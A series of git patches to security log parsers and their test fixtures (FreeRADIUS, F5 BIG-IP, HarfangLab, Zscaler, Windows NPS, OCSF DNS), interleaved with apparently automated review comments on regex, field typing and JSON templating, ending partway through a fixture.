@@ -107,5 +107,26 @@ "field": "event.reason" } ] + }, + { + "value": "Ignoring request to auth address * port {destination.port} bound to server {host.name} from unknown client {source.ip} port {source.port} proto udp", + "conditions": [ + { + "field": "freeradius.outcome", + "value": "Ignoring request to auth address" + }, + { + "field": "destination.port" + }, + { + "field": "host.name" + }, + { + "field": "source.ip" + }, + { + "field": "source.port" + } + ] } ] From 6b6375ca2377029fae141df97fad2ef59ecff345 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 20 Sep 2024 15:09:48 +0300 Subject: [PATCH 072/317] Ignore whitespace before `Rule` --- F5 Networks/f5-big-ip/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml index d100bdf97..77ee4ea1b 100644 --- a/F5 Networks/f5-big-ip/ingest/parser.yml +++ b/F5 Networks/f5-big-ip/ingest/parser.yml @@ -35,7 +35,7 @@ pipeline: RULE_HTTP_REQUEST: ": LOGS: %{RULE_LOG_MESSAGE:rule_message}" RULE_HTTP_RESPONSE: ": %{IPORHOST:destination_ip}:%{POSINT:destination_port}: HTTP: %{POSINT:http_response_status_code} response to( %{IPORHOST:destination_ip}:%{POSINT:destination_port})? from( %{IPORHOST:source_ip}:%{POSINT:source_port} )?URL: %{NOTSPACE:url_original} %{DATA} %{TLS:tls_version_protocol}%{NUMBER:tls_version}" RULE_LOG: "%{HEADER}: Rule %{NOTSPACE:rule_name} (%{RULE_HTTP_REQUEST}|%{RULE_HTTP_RESPONSE})" - RULE_LOG_REASON_ONLY: '(%{HEADER}:\s?)? Rule %{NOTSPACE:rule_name} \: %{GREEDYDATA:rule_message}' + RULE_LOG_REASON_ONLY: '(%{HEADER}:\s?)?\s?Rule %{NOTSPACE:rule_name} \: %{GREEDYDATA:rule_message}' # audit message AUDIT_LOG: '%{HEADER}:\s(\d*:\d*: )AUDIT - %{GREEDYDATA:audit_message}' From dd190e347073a2b65085c06f6191e4d3c54f302f Mon Sep 17 00:00:00 2001 
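Review bot: The description template hard-codes `auth address *` and `proto udp`, so an event whose listener is bound to a specific address or that arrived over TCP/RadSec would be summarised with details the event may not carry; the parser is not in view, so if it extracts those values they should be interpolated, and if it does not they should be dropped. A neutral wording such as `"value": "Ignoring auth request on {host.name} port {destination.port} from unknown client {source.ip}:{source.port}"` avoids asserting facts not present in the fields. It would also help analysts to say in the description that the request came from a client not listed in the server's clients configuration, since a possibly misconfigured or rogue NAS is the security-relevant part of this message.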
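Review bot: The added `\s?` before `Rule` tolerates at most one extra whitespace character, and even combined with the `\s?` inside the optional HEADER group the pattern still fails on a tab or on two or more spaces; `\s*` is the usual fix: `RULE_LOG_REASON_ONLY: '(%{HEADER}:\s?)?\s*Rule %{NOTSPACE:rule_name} \: %{GREEDYDATA:rule_message}'`. The diffstat lists only parser.yml, so no fixture exercises the leading-whitespace sample that motivated the change; a test under tests/ with such a line would guard against regression. The `pipeline` pattern map continues outside the hunk.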
From: Sebastien Quioc Date: Mon, 23 Sep 2024 10:04:16 +0200 Subject: [PATCH 073/317] fix(Harfanglab): add missing fields. --- HarfangLab/harfanglab/_meta/fields.yml | 10 ++++++++++ HarfangLab/harfanglab/ingest/parser.yml | 2 ++ 2 files changed, 12 insertions(+) diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml index e57a69bca..0a45888ac 100644 --- a/HarfangLab/harfanglab/_meta/fields.yml +++ b/HarfangLab/harfanglab/_meta/fields.yml @@ -128,6 +128,11 @@ action.properties.DetectionUser: name: action.properties.DetectionUser type: keyword +action.properties.Domain: + description: '' + name: action.properties.Domain + type: keyword + action.properties.ElevatedToken: description: '' name: action.properties.ElevatedToken @@ -778,6 +783,11 @@ action.properties.Unused6: name: action.properties.Unused6 type: keyword +action.properties.User: + description: '' + name: action.properties.User + type: keyword + action.properties.ValidatedPolicy: description: '' name: action.properties.ValidatedPolicy diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index df5369509..129a3ea38 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -300,6 +300,7 @@ stages: action.properties.DetectionID: "{{json_event.message.event_data.get('Detection ID')}}" action.properties.DetectionTime: "{{json_event.message.event_data.get('Detection Time')}}" action.properties.DetectionUser: "{{json_event.message.event_data.get('Detection User')}}" + action.properties.Domain: "{{json_event.message.event_data.get('Domain')}}" action.properties.ElevatedToken: "{{json_event.message.event_data.get('ElevatedToken')}}" action.properties.EngineVersion: "{{json_event.message.event_data.get('Engine Version')}}" action.properties.Engineup-to-date: "{{json_event.message.event_data.get('Engine up-to-date')}}" 
@@ -428,6 +429,7 @@ stages: action.properties.Unused5: "{{json_event.message.event_data.get('Unused5')}}" action.properties.Unused6: "{{json_event.message.event_data.get('Unused6')}}" action.properties.Unused: "{{json_event.message.event_data.get('Unused')}}" + action.properties.User: "{{json_event.message.event_data.get('User')}}" action.properties.ValidatedPolicy: "{{json_event.message.event_data.get('ValidatedPolicy')}}" action.properties.ValidatedSigningLevel: "{{json_event.message.event_data.get('ValidatedSigningLevel')}}" action.properties.VerificationError: "{{json_event.message.event_data.get('VerificationError')}}" From 01c4f0cc78769c75eee7ab525ca792a7c2115dbc Mon Sep 17 00:00:00 2001 From: rombernier Date: Tue, 24 Sep 2024 11:43:16 +0200 Subject: [PATCH 074/317] update HarfangLab --- HarfangLab/harfanglab/_meta/fields.yml | 10 ++++++++++ HarfangLab/harfanglab/ingest/parser.yml | 2 ++ 2 files changed, 12 insertions(+) diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml index 0a45888ac..a9fe32974 100644 --- a/HarfangLab/harfanglab/_meta/fields.yml +++ b/HarfangLab/harfanglab/_meta/fields.yml @@ -338,6 +338,11 @@ action.properties.LogonType: name: action.properties.LogonType type: keyword +action.properties.MemberName: + description: '' + name: action.properties.MemberName + type: keyword + action.properties.NRIengineversion: description: '' name: action.properties.NRIengineversion @@ -423,6 +428,11 @@ action.properties.PreExecutionStatus: name: action.properties.PreExecutionStatus type: keyword +action.properties.PrivilegeList: + description: '' + name: action.properties.PrivilegeList + type: keyword + action.properties.ProcessId: description: '' name: action.properties.ProcessId diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 129a3ea38..832463715 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml 
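Review bot: `User` (and `Domain` in the sibling hunk) are surfaced only as vendor-specific `action.properties.*` keywords; if the rest of this parser, which is not in view, does not also copy them into `user.name`/`user.domain`, these Windows audit events will not populate `related.user` and cross-source rules written on the ECS user fields will miss them. Consider adding `user.name: "{{json_event.message.event_data.get('User')}}"` and `user.domain: "{{json_event.message.event_data.get('Domain')}}"` where the parser normalises identities, or document why they stay vendor-only. The matching fields.yml entries carry `description: ''`; a one-line note on which Windows event IDs populate each field would help rule authors. The enclosing `set` action starts outside the hunk.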
@@ -342,6 +342,7 @@ stages: action.properties.LogonGuid: "{{json_event.message.event_data.get('LogonGuid')}}" action.properties.LogonProcessName: "{{json_event.message.event_data.get('LogonProcessName')}}" action.properties.LogonType: "{{json_event.message.event_data.get('LogonType')}}" + action.properties.MemberName: "{{json_event.message.event_data.get('MemberName')}}" action.properties.NRIengineversion: "{{json_event.message.event_data.get('NRI engine version')}}" action.properties.NRIsecurityintelligenceversion: "{{json_event.message.event_data.get('NRI security intelligence version')}}" action.properties.NotValidAfter: "{{json_event.message.event_data.get('NotValidAfter')}}" @@ -359,6 +360,7 @@ stages: action.properties.PostCleanStatus: "{{json_event.message.event_data.get('Post Clean Status')}}" action.properties.PreAuthType: "{{json_event.message.event_data.get('PreAuthType')}}" action.properties.PreExecutionStatus: "{{json_event.message.event_data.get('Pre Execution Status')}}" + action.properties.PrivilegeList: "{{json_event.message.event_data.get('PrivilegeList')}}" action.properties.ProcessId: "{{json_event.message.event_data.get('ProcessId')}}" action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name') or json_event.message.event_data.get('ProcessName')}}" action.properties.ProcessNameBuffer: "{{json_event.message.event_data.get('ProcessNameBuffer')}}" From 7d1e4ab7ed2dd9fe5c4e3b1b7cbc8570c1d06b1e Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 24 Sep 2024 14:42:06 +0300 Subject: [PATCH 075/317] Zscaler - add relationships --- .../zscaler-zia/_meta/smart-descriptions.json | 58 ++++++++++++++++++- 1 file changed, 57 insertions(+), 1 deletion(-) diff --git a/Zscaler/zscaler-zia/_meta/smart-descriptions.json b/Zscaler/zscaler-zia/_meta/smart-descriptions.json index e819ad2f4..d40242843 100644 --- a/Zscaler/zscaler-zia/_meta/smart-descriptions.json +++ b/Zscaler/zscaler-zia/_meta/smart-descriptions.json 
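Review bot: `PrivilegeList` is stored as a single keyword, but for the Windows events that carry it (4672/4673, to my recollection) the value is a whitespace-separated list such as several `Se*Privilege` names, so a single keyword cannot be matched exactly on one privilege and rules must fall back to substring matching. If the parser engine offers a split filter, emitting an array would make it queryable; otherwise `type: text` in fields.yml is the safer declaration, and in either case the entry should describe the list shape instead of `description: ''`. `MemberName` is a distinguished name and would likewise benefit from a description. The enclosing `set` action starts outside the hunk.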
@@ -12,6 +12,13 @@
 {
 "field": "zscaler.zia.resource"
 }
+ ],
+ "relationships": [
+ {
+ "source": "source.ip",
+ "target": "zscaler.zia.resource",
+ "type": "accessed"
+ }
 ]
 },
 {
@@ -30,6 +37,13 @@
 {
 "field": "file.name"
 }
+ ],
+ "relationships": [
+ {
+ "source": "user.email",
+ "target": "file.name",
+ "type": "accessed"
+ }
 ]
 },
 {
@@ -45,6 +59,13 @@
 {
 "field": "dns.question.name"
 }
+ ],
+ "relationships": [
+ {
+ "source": "user.email",
+ "target": "dns.question.name",
+ "type": "requested"
+ }
 ]
 },
 {
@@ -72,6 +93,13 @@
 {
 "field": "destination.address"
 }
+ ],
+ "relationships": [
+ {
+ "source": "source.ip",
+ "target": "destination.address",
+ "type": "connected"
+ }
 ]
 },
 {
@@ -99,6 +127,13 @@
 {
 "field": "destination.address"
 }
+ ],
+ "relationships": [
+ {
+ "source": "source.ip",
+ "target": "destination.address",
+ "type": "tried to connect"
+ }
 ]
 },
 {
@@ -118,6 +153,13 @@
 {
 "field": "destination.address"
 }
+ ],
+ "relationships": [
+ {
+ "source": "user.email",
+ "target": "destination.address",
+ "type": "connected"
+ }
 ]
 },
 {
@@ -137,10 +179,17 @@
 {
 "field": "destination.address"
 }
+ ],
+ "relationships": [
+ {
+ "source": "source.ip",
+ "target": "destination.address",
+ "type": "connected"
+ }
 ]
 },
 {
- "value": "{user.email} requested {url.domain} and was {event.action} ",
+ "value": "{user.email} requested {url.domain} and was {event.action}",
 "conditions": [
 {
 "field": "event.category",
@@ -155,6 +204,13 @@
 {
 "field": "event.action"
 }
+ ],
+ "relationships": [
+ {
+ "source": "user.email",
+ "target": "url.domain",
+ "type": "requested"
+ }
 ]
 }
 ]
From 87e6f28841bd09bcfd12ecdf157c634cab09b7a1 Mon Sep 17 00:00:00 2001
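Review bot: `"type": "tried to connect"` in the `@@ -99,6 +127,13 @@` hunk is the only multi-word relationship type added here; every other new entry uses a single verb (`accessed`, `requested`, `connected`). If the consumer treats the type as a closed set, confirm this value belongs to it; if it is a free label, a single-token spelling would keep the file consistent and greppable. The `source` alternates between `source.ip` and `user.email` across otherwise similar descriptions — presumably it follows which field each description extracts, but it is worth checking that every `source`/`target` named in a `relationships` block is also listed in that description's `fields`, since a relationship on an absent field is silently empty.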
From: "vladyslav.guriev" Date: Wed, 25 Sep 2024 14:41:04 +0300 Subject: [PATCH 076/317] Fix: Windows add CallingStationID --- Windows/windows/_meta/fields.yml | 5 ++ Windows/windows/ingest/parser.yml | 1 + Windows/windows/tests/Event_6272.json | 1 + Windows/windows/tests/Event_6273.json | 1 + Windows/windows/tests/process_6272.json | 78 +++++++++++++++++++++++++ 5 files changed, 86 insertions(+) create mode 100644 Windows/windows/tests/process_6272.json diff --git a/Windows/windows/_meta/fields.yml b/Windows/windows/_meta/fields.yml index a67b2755f..447421f6d 100644 --- a/Windows/windows/_meta/fields.yml +++ b/Windows/windows/_meta/fields.yml @@ -763,6 +763,11 @@ action.properties.ProcessName: name: action.properties.ProcessName type: keyword +action.properties.CallingStationID: + description: '' + name: action.properties.CallingStationID + type: keyword + action.properties.ProcessPath: description: '' name: action.properties.ProcessPath diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 4e47c5e7a..1c4eee181 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -332,6 +332,7 @@ stages: action.properties.DestinationPort: "{{json.event.DestinationPort or json.event.DestPort}}" action.properties.ErrorCode: '{{ json.event.get("Error Code") or json.event.ErrorCode }}' action.properties.ProcessName: '{{ json.event.ProcessName or json.event.get("Process Name") }}' + action.properties.CallingStationID: '{{ json.event.CallingStationID }}' action.properties.ThreatName: '{{ json.event.get("Threat Name") }}' action.properties.DetectionUser: '{{ json.event.get("Detection User") }}' diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json index 3d99dd9ef..4a3212af2 100644 --- a/Windows/windows/tests/Event_6272.json +++ b/Windows/windows/tests/Event_6272.json 
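Review bot: `action.properties.CallingStationID: '{{ json.event.CallingStationID }}'` takes the raw value with no type guard, and the fixtures in this same commit show it in two shapes — a MAC address `a9-7c-7d-ac-47-67` in Event_6272.json and an IP `10.24.25.25` in process_6272.json — so the value cannot be promoted to a typed ECS field without an `is_ipaddress`-style check and a fallback to the MAC field. The matching fields.yml entry also has `description: ''`; documenting the two forms avoids analysts assuming one, e.g. `description: 'Calling-Station-Id reported by the NAS: MAC address or IP address of the connecting client'`. If a later step is meant to derive `source.ip`/`source.mac` from it, that is not in this commit.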
@@ -18,6 +18,7 @@ "AuthenticationProvider": "Windows", "AuthenticationServer": "auth.example.org", "AuthenticationType": "PEAP", + "CallingStationID": "a9-7c-7d-ac-47-67", "Category": "Network Policy Server", "ClientIPAddress": "1.2.3.4", "ClientName": "ELEBEYCOBI", diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json index db18b5038..8ad5a2226 100644 --- a/Windows/windows/tests/Event_6273.json +++ b/Windows/windows/tests/Event_6273.json @@ -18,6 +18,7 @@ "AuthenticationProvider": "Windows", "AuthenticationServer": "auth.example.org", "AuthenticationType": "EAP", + "CallingStationID": "a9-7c-7d-ac-47-67", "Category": "Network Policy Server", "ClientIPAddress": "1.2.3.4", "ClientName": "1.2.3.4", diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json new file mode 100644 index 000000000..af1d9fe1d --- /dev/null +++ b/Windows/windows/tests/process_6272.json 
@@ -0,0 +1,78 @@ +{ + "input": { + "message": "{\"EventTime\":\"2024-09-18 10:08:41\",\"Hostname\":\"test\",\"Keywords\":-9214364837600034816,\"EventType\":\"AUDIT_SUCCESS\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":6272,\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"ProviderGuid\":\"{000000000-0000-0000-A5BA-3E3B0328C30D}\",\"Version\":2,\"Task\":12552,\"OpcodeValue\":0,\"RecordNumber\":2324634,\"ActivityID\":\"{9481D23D-1111-1111-1111-1DD10B0E2623}\",\"ProcessID\":672,\"ThreadID\":3752,\"Channel\":\"Security\",\"Message\":\"Le serveur NPS a accorde lacces a un utilisateur. Utilisateur : ID de securite : S-1-5-21-1111111111-111111111-1111111111-1111 Nom de compte : testUser Domaine de compte : NT01 Nom de compte complet : net/Administrateurs/ITUser/testUser Ordinateur client : ID de securite : S-1-0-0 Nom de compte : - Nom de compte complet : - Identificateur de la station appelee : 1.2.3.4 Identificateur de la station appelante : 10.24.25.25 Serveur NAS : Adresse IPv4 du serveur NAS : 1.2.3.4 Adresse IPv6 du serveur NAS : - Identificateur du serveur NAS : - Type de port du serveur NAS : Virtuel Port du serveur NAS : 450560 Client RADIUS : Nom convivial du client : FW01 Adresse IP du client : 1.2.3.4 Informations detaillees sur lauthentification : Nom de strategie de demande de connexion : interface_admin_reseau Nom de strategie reseau : FWASA01_Admin Fournisseur dauthentification : RADIUS distant vers le mappage utilisateur Windows Serveur dauthentification : 1.2.3.4 Type dauthentification : - Type EAP : - Identificateur de la session du compte : - Resultats de la journalisation : Les informations de suivi ont ete inscrites dans le fichier journal local. 
\",\"Category\":\"Network Policy Server\",\"Opcode\":\"Informations\",\"SubjectUserSid\":\"S-1-5-21-1111111111-111111111-1111111111-1111\",\"SubjectUserName\":\"testUser\",\"SubjectDomainName\":\"NT01\",\"FullyQualifiedSubjectUserName\":\"test.net/Administrateurs/ITUser/testUser\",\"SubjectMachineSID\":\"S-1-0-0\",\"SubjectMachineName\":\"-\",\"FullyQualifiedSubjectMachineName\":\"-\",\"CalledStationID\":\"1.2.3.4\",\"CallingStationID\":\"10.24.25.25\",\"NASIPv4Address\":\"1.2.3.4\",\"NASIPv6Address\":\"-\",\"NASIdentifier\":\"-\",\"NASPortType\":\"Virtuel\",\"NASPort\":\"450560\",\"ClientName\":\"FW01\",\"ClientIPAddress\":\"1.2.3.4\",\"ProxyPolicyName\":\"interface_admin_reseau\",\"NetworkPolicyName\":\"FWASA01_Admin\",\"AuthenticationProvider\":\"RADIUS distant vers le mappage utilisateur Windows\",\"AuthenticationServer\":\"1.2.3.4\",\"AuthenticationType\":\"-\",\"EAPType\":\"-\",\"AccountSessionIdentifier\":\"-\",\"LoggingResult\":\"Les informations de suivi ont ete inscrites dans le fichier journal local.\",\"EventReceivedTime\":\"2024-09-18 10:09:24\",\"SourceModuleName\":\"eventlog41\",\"SourceModuleType\":\"im_msvistalog\"}" + }, + "expected": { + "message": "{\"EventTime\":\"2024-09-18 10:08:41\",\"Hostname\":\"test\",\"Keywords\":-9214364837600034816,\"EventType\":\"AUDIT_SUCCESS\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":6272,\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"ProviderGuid\":\"{000000000-0000-0000-A5BA-3E3B0328C30D}\",\"Version\":2,\"Task\":12552,\"OpcodeValue\":0,\"RecordNumber\":2324634,\"ActivityID\":\"{9481D23D-1111-1111-1111-1DD10B0E2623}\",\"ProcessID\":672,\"ThreadID\":3752,\"Channel\":\"Security\",\"Message\":\"Le serveur NPS a accorde lacces a un utilisateur. 
Utilisateur : ID de securite : S-1-5-21-1111111111-111111111-1111111111-1111 Nom de compte : testUser Domaine de compte : NT01 Nom de compte complet : net/Administrateurs/ITUser/testUser Ordinateur client : ID de securite : S-1-0-0 Nom de compte : - Nom de compte complet : - Identificateur de la station appelee : 1.2.3.4 Identificateur de la station appelante : 10.24.25.25 Serveur NAS : Adresse IPv4 du serveur NAS : 1.2.3.4 Adresse IPv6 du serveur NAS : - Identificateur du serveur NAS : - Type de port du serveur NAS : Virtuel Port du serveur NAS : 450560 Client RADIUS : Nom convivial du client : FW01 Adresse IP du client : 1.2.3.4 Informations detaillees sur lauthentification : Nom de strategie de demande de connexion : interface_admin_reseau Nom de strategie reseau : FWASA01_Admin Fournisseur dauthentification : RADIUS distant vers le mappage utilisateur Windows Serveur dauthentification : 1.2.3.4 Type dauthentification : - Type EAP : - Identificateur de la session du compte : - Resultats de la journalisation : Les informations de suivi ont ete inscrites dans le fichier journal local. 
\",\"Category\":\"Network Policy Server\",\"Opcode\":\"Informations\",\"SubjectUserSid\":\"S-1-5-21-1111111111-111111111-1111111111-1111\",\"SubjectUserName\":\"testUser\",\"SubjectDomainName\":\"NT01\",\"FullyQualifiedSubjectUserName\":\"test.net/Administrateurs/ITUser/testUser\",\"SubjectMachineSID\":\"S-1-0-0\",\"SubjectMachineName\":\"-\",\"FullyQualifiedSubjectMachineName\":\"-\",\"CalledStationID\":\"1.2.3.4\",\"CallingStationID\":\"10.24.25.25\",\"NASIPv4Address\":\"1.2.3.4\",\"NASIPv6Address\":\"-\",\"NASIdentifier\":\"-\",\"NASPortType\":\"Virtuel\",\"NASPort\":\"450560\",\"ClientName\":\"FW01\",\"ClientIPAddress\":\"1.2.3.4\",\"ProxyPolicyName\":\"interface_admin_reseau\",\"NetworkPolicyName\":\"FWASA01_Admin\",\"AuthenticationProvider\":\"RADIUS distant vers le mappage utilisateur Windows\",\"AuthenticationServer\":\"1.2.3.4\",\"AuthenticationType\":\"-\",\"EAPType\":\"-\",\"AccountSessionIdentifier\":\"-\",\"LoggingResult\":\"Les informations de suivi ont ete inscrites dans le fichier journal local.\",\"EventReceivedTime\":\"2024-09-18 10:09:24\",\"SourceModuleName\":\"eventlog41\",\"SourceModuleType\":\"im_msvistalog\"}", + "event": { + "code": "6272", + "message": "Le serveur NPS a accorde lacces a un utilisateur. 
Utilisateur : ID de securite : S-1-5-21-1111111111-111111111-1111111111-1111 Nom de compte : testUser Domaine de compte : NT01 Nom de compte complet : net/Administrateurs/ITUser/testUser Ordinateur client : ID de securite : S-1-0-0 Nom de compte : - Nom de compte complet : - Identificateur de la station appelee : 1.2.3.4 Identificateur de la station appelante : 10.24.25.25 Serveur NAS : Adresse IPv4 du serveur NAS : 1.2.3.4 Adresse IPv6 du serveur NAS : - Identificateur du serveur NAS : - Type de port du serveur NAS : Virtuel Port du serveur NAS : 450560 Client RADIUS : Nom convivial du client : FW01 Adresse IP du client : 1.2.3.4 Informations detaillees sur lauthentification : Nom de strategie de demande de connexion : interface_admin_reseau Nom de strategie reseau : FWASA01_Admin Fournisseur dauthentification : RADIUS distant vers le mappage utilisateur Windows Serveur dauthentification : 1.2.3.4 Type dauthentification : - Type EAP : - Identificateur de la session du compte : - Resultats de la journalisation : Les informations de suivi ont ete inscrites dans le fichier journal local. 
", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "action": { + "id": 6272, + "name": "Network Policy Server granted access to a user", + "outcome": "success", + "properties": { + "AuthenticationProvider": "RADIUS distant vers le mappage utilisateur Windows", + "AuthenticationServer": "1.2.3.4", + "AuthenticationType": "-", + "CallingStationID": "10.24.25.25", + "Category": "Network Policy Server", + "ClientIPAddress": "1.2.3.4", + "ClientName": "FW01", + "EAPType": "-", + "EventType": "AUDIT_SUCCESS", + "Keywords": "-9214364837600034816", + "NASIdentifier": "-", + "NASPort": "450560", + "NASPortType": "Virtuel", + "NetworkPolicyName": "FWASA01_Admin", + "OpcodeValue": 0, + "ProviderGuid": "{000000000-0000-0000-A5BA-3E3B0328C30D}", + "ProxyPolicyName": "interface_admin_reseau", + "Severity": "INFO", + "SourceName": "Microsoft-Windows-Security-Auditing", + "SubjectDomainName": "NT01", + "SubjectUserName": "testUser", + "SubjectUserSid": "S-1-5-21-1111111111-111111111-1111111111-1111", + "Task": 12552 + }, + "record_id": 2324634, + "type": "Security" + }, + "host": { + "hostname": "test", + "name": "test" + }, + "log": { + "hostname": "test", + "level": "info" + }, + "os": { + "family": "windows", + "platform": "windows" + }, + "process": { + "id": 672, + "pid": 672, + "thread": { + "id": 3752 + } + }, + "related": { + "hosts": [ + "test" + ], + "user": [ + "testUser" + ] + }, + "user": { + "domain": "NT01", + "id": "S-1-5-21-1111111111-111111111-1111111111-1111", + "name": "testUser" + } + } +} \ No newline at end of file From 84cff00a0efd6679e42b1e9a97bb9d009570939c Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 25 Sep 2024 14:42:10 +0300 Subject: [PATCH 077/317] apply linter --- Windows/windows/_meta/fields.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/Windows/windows/_meta/fields.yml b/Windows/windows/_meta/fields.yml index 447421f6d..88ac632ea 100644 
--- a/Windows/windows/_meta/fields.yml +++ b/Windows/windows/_meta/fields.yml @@ -148,6 +148,11 @@ action.properties.CallerProcessName: name: action.properties.CallerProcessName type: keyword +action.properties.CallingStationID: + description: '' + name: action.properties.CallingStationID + type: keyword + action.properties.Category: description: '' name: action.properties.Category @@ -763,11 +768,6 @@ action.properties.ProcessName: name: action.properties.ProcessName type: keyword -action.properties.CallingStationID: - description: '' - name: action.properties.CallingStationID - type: keyword - action.properties.ProcessPath: description: '' name: action.properties.ProcessPath From c8a3fc7224c5280779ae736ae894f3400b2421bd Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 25 Sep 2024 14:44:21 +0300 Subject: [PATCH 078/317] apply prettier --- Windows/windows/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 1c4eee181..8107e623a 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -332,7 +332,7 @@ stages: action.properties.DestinationPort: "{{json.event.DestinationPort or json.event.DestPort}}" action.properties.ErrorCode: '{{ json.event.get("Error Code") or json.event.ErrorCode }}' action.properties.ProcessName: '{{ json.event.ProcessName or json.event.get("Process Name") }}' - action.properties.CallingStationID: '{{ json.event.CallingStationID }}' + action.properties.CallingStationID: "{{ json.event.CallingStationID }}" action.properties.ThreatName: '{{ json.event.get("Threat Name") }}' action.properties.DetectionUser: '{{ json.event.get("Detection User") }}' From 2b493beed70dabdcdb57fd9369ecf65f96b3ff89 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Fri, 27 Sep 2024 17:08:08 +0200 Subject: [PATCH 079/317] fix(OCSF): fix the parsing of dns anwsers --- OCSF/ocsf/ingest/parser.yml | 2 +- OCSF/ocsf/tests/test_dns_activity_3.json | 90 ++++++++++++++++++++++++ 2 files changed, 91 insertions(+), 1 deletion(-) create mode 100644 OCSF/ocsf/tests/test_dns_activity_3.json diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 19713e433..765a6a76d 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml @@ -1000,7 +1000,7 @@ stages: {%- if item.get('type') != None -%}"type": "{{item.type}}",{%- endif -%} {%- if item.get('ttl') != None -%}"ttl": "{{item.ttl}}",{%- endif -%} {%- if item.get('rdata') != None -%}"data": "{{item.rdata}}",{%- endif -%} - } + }, {%- endfor -%} ] filter: "{{ parse_event.message.get('answers') != None }}" diff --git a/OCSF/ocsf/tests/test_dns_activity_3.json b/OCSF/ocsf/tests/test_dns_activity_3.json new file mode 100644 index 000000000..f8f4e6433 --- /dev/null +++ b/OCSF/ocsf/tests/test_dns_activity_3.json 
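Review bot: `"data": "{{item.rdata}}"` (and the sibling `type`/`ttl` lines) interpolate answer values into a JSON text without escaping, so an rdata containing a double quote or a backslash — TXT records are free-form — produces a document the next stage cannot parse and the answers are lost, which is the kind of input a defender least wants to drop. The comma fix also leaves a trailing `,` after the last object and after the last property of each object, so the generated list only parses under a lenient reader; `{%- if not loop.last -%},{%- endif -%}` in place of the unconditional `,` after `}` yields strict JSON for the array. If the template engine exposes a JSON serialisation filter, building each answer as a mapping and serialising it would address both issues at once. The enclosing `- set:` action begins outside the hunk.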
@@ -0,0 +1,90 @@ +{ + "input": { + "message": "{\"metadata\":{\"product\":{\"version\":\"1.100000\",\"name\":\"Route 53\",\"feature\":{\"name\":\"Resolver Query Logs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"src_endpoint\":{\"vpc_uid\":\"vpc-11111111\",\"ip\":\"1.2.3.4\",\"port\":62699,\"instance_uid\":\"i-11111111111111111\"},\"time\":1726395887000,\"time_dt\":1726395887000,\"query\":{\"hostname\":\"settings-win.data.microsoft.com.\",\"type\":\"A\",\"class\":\"IN\"},\"answers\":[{\"type\":\"CNAME\",\"rdata\":\"atm-settingsfe-prod-geo2.trafficmanager.net.\",\"class\":\"IN\"},{\"type\":\"CNAME\",\"rdata\":\"settings-prod-weu-2.westeurope.cloudapp.azure.com.\",\"class\":\"IN\"},{\"type\":\"A\",\"rdata\":\"5.6.7.8\",\"class\":\"IN\"}],\"connection_info\":{\"protocol_name\":\"UDP\",\"direction\":\"Unknown\",\"direction_id\":0},\"dst_endpoint\":null,\"firewall_rule\":null,\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"DNS Activity\",\"class_uid\":4003,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_id\":6,\"activity_name\":\"Traffic\",\"type_uid\":400306,\"type_name\":\"DNS Activity: Traffic\",\"rcode_id\":0,\"rcode\":\"NoError\",\"disposition\":\"Unknown\",\"action\":\"Unknown\",\"action_id\":0,\"unmapped\":null,\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"answers[].rdata\",\"value\":\"settings-prod-weu-2.westeurope.cloudapp.azure.com.\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"src_endpoint.instance_uid\",\"value\":\"i-11111111111111111\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"answers[].rdata\",\"value\":\"5.6.7.8\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP 
